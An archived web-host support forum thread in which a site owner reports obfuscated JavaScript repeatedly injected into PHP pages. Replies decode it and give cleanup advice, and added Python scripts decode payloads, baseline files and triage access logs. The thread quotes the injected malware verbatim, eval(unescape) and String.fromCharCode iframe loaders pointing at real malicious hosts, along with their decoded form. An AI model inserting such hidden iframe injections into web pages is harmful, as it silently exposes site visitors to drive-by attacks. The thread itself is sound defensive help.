
Malicious Javascript Code in PHP Files - Hackers?


olimits7

Posted

Hello,

I've recently been noticing the following malicious javascript code in certain php files on my webserver. It seems it's mainly focusing on targeting all index.php, main.php, and login.php pages.

When I load my homepage I see in the bottom corner of IE, in the status bar section, that it says "Waiting for http://fen0men.info/exp/index.php..." which is definitely some type of malicious script trying to run.

This is what I see in some of my php files:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%31%64%62%64%37%34%32%32%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%30%30%31%36%38%29%2b%27%62%31%33%62%36%65%5c%27%20%77%69%64%74%68%3d%37%36%34%20%68%65%69%67%68%74%3d%32%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

and

<script language="JavaScript"> document.write(String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 102, 101, 110, 48, 109, 101, 110, 46, 105, 110, 102, 111, 47, 101, 120, 112, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 32, 119, 105, 100, 116, 104, 61, 34, 48, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 48, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62)); </script>

I tried deleting the code, but then when I check my website the next day the code is back in there. I'm guessing I have a security hole somewhere in my website. Does anybody know how I can fix and close these security holes? How did these hackers get access to my website?

Thank you,

olimits7
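The two snippets quoted above can be decoded without ever executing them. The script below is an added example, not code from this thread or from osCommerce: it recognises the two obfuscation patterns the poster found (eval(unescape("%XX...")) and String.fromCharCode(...)), decodes them as plain strings, extracts the URLs they reference, and can be pointed at a document root to find other PHP files carrying the same patterns. The sample strings are the ones quoted in the post; the scan_php_files helper and its command-line use are assumptions of this example.

```python
import os
import re
import sys
from urllib.parse import unquote

# Sample input: the two injected snippets quoted in the post, held as plain
# strings. Nothing in this script is ever handed to a JavaScript engine.
SAMPLE_SNIPPETS = [
    '<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%31%64%62%64%37%34%32%32%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%30%30%31%36%38%29%2b%27%62%31%33%62%36%65%5c%27%20%77%69%64%74%68%3d%37%36%34%20%68%65%69%67%68%74%3d%32%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>',
    '<script language="JavaScript"> document.write(String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 102, 101, 110, 48, 109, 101, 110, 46, 105, 110, 102, 111, 47, 101, 120, 112, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 32, 119, 105, 100, 116, 104, 61, 34, 48, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 48, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62)); </script>',
]

# Pattern 1: eval(unescape("...")) wrapping a %XX-encoded string literal.
UNESCAPE_RE = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*"((?:%[0-9A-Fa-f]{2}|[^"])*)"\s*\)\s*\)')
# Pattern 2: String.fromCharCode(60, 105, ...) with a comma-separated code list.
CHARCODE_RE = re.compile(r'String\.fromCharCode\s*\(\s*([\d\s,]+)\)')
# URLs inside a decoded payload; stops at quotes, backslashes and angle brackets.
URL_RE = re.compile(r'https?://[^\s\'"\\<>]+')


def js_unescape(text):
    """Decode like JavaScript's unescape(): %XX is one Latin-1 code unit and
    %uXXXX one UTF-16 code unit. urllib's unquote alone would treat %XX runs
    as UTF-8 bytes, which is not what this encoder produced."""
    text = re.sub(r'%u([0-9A-Fa-f]{4})',
                  lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding='latin-1')


def decode_snippets(text):
    """Return (payloads, urls): every decoded payload found in `text` and the
    URLs those payloads reference, without evaluating any script."""
    payloads = [js_unescape(m.group(1)) for m in UNESCAPE_RE.finditer(text)]
    for m in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in m.group(1).split(',') if c.strip()]
        payloads.append(''.join(chr(c) for c in codes))
    # A trailing '?' is the start of the random query string, not part of the host/path.
    urls = sorted({u.rstrip('?') for p in payloads for u in URL_RE.findall(p)})
    return payloads, urls


def scan_php_files(root):
    """Walk `root` (assumed document root) and report .php files containing
    either pattern, mapped to their decoded payloads and URLs."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                payloads, urls = decode_snippets(fh.read())
            if payloads:
                findings[path] = (payloads, urls)
    return findings


if __name__ == '__main__':
    if len(sys.argv) > 1:
        # usage: python decode_injected.py /path/to/docroot
        for path, (payloads, urls) in scan_php_files(sys.argv[1]).items():
            print(path, '->', ', '.join(urls))
    else:
        for snippet in SAMPLE_SNIPPETS:
            payloads, urls = decode_snippets(snippet)
            for p in payloads:
                print('decoded:', p)
            print('urls:', urls)
```

Both decoders are pure string operations, so the script is safe to run on infected files; the hidden iframes it reveals (height 0 or display: none) are what silently pull the remote page into every visitor's browser.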

Posted

This is what I get when I decode the scripts:

window.status='Done';document.write('<iframe name=11dbd7422b src=\'http://alltraff.ru/lol.php?'+Math.round(Math.random()*200168)+'b13b6e\' width=764 height=262 style=\'display: none\'></iframe>')

And:

<iframe src="http://fen0men.info/exp/index.php" width="0" height="0"></iframe>

Change all your passwords (to your osc admin, your site's control panel, and all .htaccess).

After fixing the modified pages, change them to "read only" (444 permissions) to see if that helps.

Report the hack to your web host. The server may have been hacked. If that's the case, nothing you do can stop it.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help
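The advice above (clean the pages, set them to 444, watch whether the code comes back) works best with a record of what "clean" looked like. The following Python script is an added example, not code from this thread or from osCommerce: it hashes every .php and .htaccess file under a document root into a baseline, reports files that later change, appear or vanish, and lists files that still carry a write bit. The demo_reinfection function builds a small constructed docroot in a temporary directory to show the output; the file names and paths there are hypothetical.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, exts=('.php', '.htaccess')):
    """Map each matching file (path relative to root) to its SHA-256."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_of(full)
    return baseline


def compare_baseline(root, baseline):
    """Files whose content changed, appeared or vanished since the baseline."""
    current = build_baseline(root)
    return {
        'modified': sorted(k for k in baseline
                           if k in current and current[k] != baseline[k]),
        'added': sorted(k for k in current if k not in baseline),
        'removed': sorted(k for k in baseline if k not in current),
    }


def writable_files(root, exts=('.php',)):
    """Files that still carry any write bit (owner, group or other),
    i.e. pages that were not set to 444."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                if os.stat(full).st_mode & 0o222:
                    found.append(os.path.relpath(full, root))
    return sorted(found)


def demo_reinfection():
    """Constructed scenario: baseline three clean pages, lock index.php to 444,
    then simulate a re-injection into login.php and a dropped new file.
    Returns (diff, still_writable)."""
    root = tempfile.mkdtemp(prefix='oscdemo_')
    try:
        for name in ('index.php', 'login.php', 'main.php'):
            with open(os.path.join(root, name), 'w') as fh:
                fh.write('<?php echo "clean"; ?>\n')
        baseline = build_baseline(root)
        os.chmod(os.path.join(root, 'index.php'), 0o444)
        # Simulated re-injection (constructed marker, not the real payload).
        with open(os.path.join(root, 'login.php'), 'a') as fh:
            fh.write('<script>document.write("injected")</script>\n')
        with open(os.path.join(root, 'dropped.php'), 'w') as fh:
            fh.write('<?php /* file that was not in the baseline */ ?>\n')
        return compare_baseline(root, baseline), writable_files(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == '__main__':
    diff, writable = demo_reinfection()
    print('changes since baseline:', diff)
    print('still writable:', writable)
```

Keep the baseline file somewhere the web server cannot write to (ideally off the server), and rerun the comparison on a schedule. Note that 444 only stops accidental writes: whoever owns the files, or a process running as that user, can chmod them back, so a file that was 444 and is now 644 is itself a useful signal rather than a failure of the advice.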

Posted

Thank you for your quick reply.

OK, I will make the following changes and see what happens. I am on a managed dedicated server, so I do know that I'm the only website on that server. I'll try contacting my hosting company to see if they can check whether there is something wrong with the server. When I call them, should I tell them to check anything in particular?

Thanks for decoding the scripts! Do you know what these scripts actually do to my website?

Thanks again,

olimits7

Posted

The scripts are a way to steal information.

I'm thinking they should be able to look at the server logs for your site and at least get a clue as to how they're getting in.


Posted

If you did, would you know what to look for in the logs?

:unsure:

I'm not exactly sure what you should be looking for myself, but I still think the logs could reveal something.

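One concrete thing to look for in the logs is what the web server was serving at the moment the file changed. The script below is an added example, not code from this thread or from osCommerce: it parses Apache/nginx combined-format access log lines, keeps the requests within a window around a file's modification time, and flags the ones that could have written to disk through the application (POST requests and anything under the admin area). The log lines are constructed for the example, with documentation-range IPs and hypothetical admin paths; SAMPLE_MTIME stands in for the mtime that stat would report on the modified page.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?')

# Constructed sample log: documentation-range IPs, hypothetical /admin/ paths.
SAMPLE_LOG = """\
198.51.100.10 - - [12/Mar/2009:02:40:11 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2009:03:12:45 +0000] "GET /admin/login.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2009:03:13:02 +0000] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
203.0.113.7 - - [12/Mar/2009:03:14:30 +0000] "POST /admin/edit.php?file=login.php HTTP/1.1" 200 150 "-" "Mozilla/4.0"
198.51.100.22 - - [12/Mar/2009:03:16:09 +0000] "GET /main.php HTTP/1.1" 200 7420 "-" "Mozilla/5.0"
198.51.100.22 - - [12/Mar/2009:05:01:00 +0000] "GET /login.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""

# Constructed stand-in for the modification time of the injected login.php.
SAMPLE_MTIME = datetime(2009, 3, 12, 3, 14, 45, tzinfo=timezone.utc)


def mtime_of(path):
    """Modification time of a real file as a timezone-aware datetime."""
    return datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)


def parse_line(line):
    """One log line -> dict with a parsed 'time', or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['time'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec


def requests_near(lines, mtime, window=timedelta(minutes=15)):
    """Requests within `window` of the file's mtime, oldest first."""
    hits = [r for r in map(parse_line, lines)
            if r and abs(r['time'] - mtime) <= window]
    return sorted(hits, key=lambda r: r['time'])


def triage(lines, mtime, window=timedelta(minutes=15)):
    """Among the requests near mtime, flag those that could have written a
    file through the application: any POST, and anything under /admin/.
    Returns {ip: [(iso_time, method, path, reasons), ...]}."""
    flagged = {}
    for r in requests_near(lines, mtime, window):
        reasons = []
        if r['method'] == 'POST':
            reasons.append('POST')
        if r['path'].startswith('/admin/'):
            reasons.append('admin')
        if reasons:
            flagged.setdefault(r['ip'], []).append(
                (r['time'].isoformat(), r['method'], r['path'], reasons))
    return flagged


if __name__ == '__main__':
    # usage with real data: triage(open(logfile).read().splitlines(), mtime_of(page))
    for ip, entries in triage(SAMPLE_LOG.splitlines(), SAMPLE_MTIME).items():
        print(ip)
        for when, method, path, reasons in entries:
            print('  ', when, method, path, ','.join(reasons))
```

Run this for each modified page (index.php, main.php, login.php) and compare the IPs that surface; a single address that logs into the admin area and POSTs minutes before each file changed is the kind of clue the reply above is hoping for. If the host's answer is that the server itself was compromised, treat both the timestamps and the logs as untrusted, since an attacker with shell access can reset one and edit the other.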

Archived

This topic is now archived and is closed to further replies.
